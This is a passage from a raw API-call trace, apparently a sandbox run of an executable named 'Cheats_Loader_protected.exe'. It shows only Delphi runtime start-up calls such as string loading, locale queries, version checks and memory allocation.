0x19 [0042.392] LoadStringA (in: hInstance=0xa9a000, uID=0xffd3, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0042.392] LoadStringA (in: hInstance=0xa9a000, uID=0xffd4, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0042.392] LoadStringA (in: hInstance=0xa9a000, uID=0xffef, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffd2, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffee, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffeb, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffd1, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffd0, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffe4, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffe5, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffe6, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffe3, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffe1, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xffff, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfffe, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfffd, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfffc, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfffb, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfffa, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff9, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff8, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff7, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff6, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff5, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff4, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff3, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0042.393] LoadStringA (in: hInstance=0xa9a000, uID=0xfff2, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0042.433] LoadStringA (in: hInstance=0xa9a000, uID=0xfff0, lpBuffer=0x13ffa04, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0042.433] LoadStringA (in: hInstance=0xa9a000, uID=0xffe0, lpBuffer=0x13ffa04, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0042.433] GetVersionExA (in: lpVersionInformation=0x13ffd9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x13ffd9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0042.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0042.434] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceExA") returned 0x7733ee90 [0042.434] GetThreadLocale () returned 0x409 [0042.434] GetThreadLocale () returned 0x409 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jan") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="January") returned 8 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Feb") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="February") returned 9 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Mar") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="March") returned 6 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Apr") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="April") returned 6 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="May") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="May") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jun") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="June") returned 5 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jul") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="July") returned 5 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Aug") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="August") returned 7 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sep") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="September") returned 10 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Oct") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="October") returned 8 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Nov") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="November") returned 9 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Dec") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="December") returned 9 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sun") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sunday") returned 7 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Mon") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Monday") returned 7 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Tue") returned 4 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0042.434] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Wed") returned 4 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Thu") returned 4 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Thursday") returned 9 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Fri") returned 4 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Friday") returned 7 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sat") returned 4 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Saturday") returned 9 [0042.435] GetThreadLocale () returned 0x409 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="$") returned 2 [0042.435] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0042.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=",") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=".") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="2") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData="/") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0042.545] GetThreadLocale () returned 0x409 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x13ffc9c, cchData=256 | out: lpLCData="1") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0042.545] GetThreadLocale () returned 0x409 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x13ffc9c, cchData=256 | out: lpLCData="1") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=":") returned 2 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="AM") returned 3 [0042.545] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="PM") returned 3 [0042.546] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0042.546] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0042.546] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0042.546] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=",") returned 2 [0042.546] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x2b90000 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2b904a0 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2ba04a8 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2bb04b0 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2bc04b8 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2bd04c0 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2be04c8 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2bf04d0 [0043.288] RtlAllocateHeap (HeapHandle=0x2b90000, Flags=0x0, Size=0x10000) returned 0x2c004d8 [0043.511] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x639f8 [0043.511] GetKeyboardType (nTypeFlag=0) returned 4 [0043.783] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0043.783] GetStartupInfoA (in: lpStartupInfo=0x13ffdf8 | out: lpStartupInfo=0x13ffdf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0043.783] GetVersion () returned 0x23f00206 [0043.783] GetVersion () returned 0x23f00206 [0043.783] GetCurrentThreadId () returned 0x13dc [0043.941] GetModuleFileNameA (in: hModule=0xa90000, lpFilename=0x13ff8f4, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0043.941] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x13ff7cf, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0043.941] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0043.941] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0043.941] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0043.941] lstrcpynA (in: lpString1=0x13ff7cf, lpString2="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", iMaxLength=261 | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" [0043.941] GetThreadLocale () returned 0x409 [0043.941] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x13ff8df, cchData=5 | out: lpLCData="ENU") returned 4 [0043.942] lstrlenA (lpString="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 51 [0043.942] lstrcpynA (in: lpString1=0x13ff7ff, lpString2="ENU", iMaxLength=213 | out: lpString1="ENU") returned="ENU" [0043.942] LoadLibraryExA (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0044.081] lstrcpynA (in: lpString1=0x13ff7ff, lpString2="EN", iMaxLength=213 | out: lpString1="EN") returned="EN" [0044.081] LoadLibraryExA (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0044.082] LoadStringA (in: hInstance=0xa9a000, uID=0xffc2, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0044.119] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x71360 [0044.237] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0xe20000 [0044.237] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x72360 [0044.237] VirtualAlloc (lpAddress=0xe20000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xe20000 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffc1, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffc0, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffd2, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffdb, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffd1, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffee, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffd5, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffd4, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe7, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe8, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe9, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe6, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe4, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe2, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe1, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffe0, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xffff, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfffe, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfffd, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfffc, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfffb, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfffa, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfff9, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfff8, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfff7, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfff6, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0044.238] LoadStringA (in: hInstance=0xa9a000, uID=0xfff5, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0044.258] LoadStringA (in: hInstance=0xa9a000, uID=0xfff3, lpBuffer=0x13ffa04, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0044.258] LoadStringA (in: hInstance=0xa9a000, uID=0xffe3, lpBuffer=0x13ffa04, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0044.258] GetVersionExA (in: lpVersionInformation=0x13ffd9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x13ffdd8, dwMinorVersion=0x779b2eea, dwBuildNumber=0x2c, dwPlatformId=0x140008, szCSDVersion="") | out: lpVersionInformation=0x13ffd9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0044.274] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0044.274] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceExA") returned 0x7733ee90 [0044.274] GetThreadLocale () returned 0x409 [0044.274] GetThreadLocale () returned 0x409 [0044.294] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jan") returned 4 [0044.294] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="January") returned 8 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Feb") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="February") returned 9 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Mar") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="March") returned 6 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Apr") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="April") returned 6 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="May") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="May") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jun") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="June") returned 5 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Jul") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="July") returned 5 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Aug") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="August") returned 7 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sep") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="September") returned 10 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Oct") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="October") returned 8 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Nov") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="November") returned 9 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Dec") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="December") returned 9 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sun") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sunday") returned 7 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Mon") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Monday") returned 7 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Tue") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Wed") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Thu") returned 4 [0044.295] 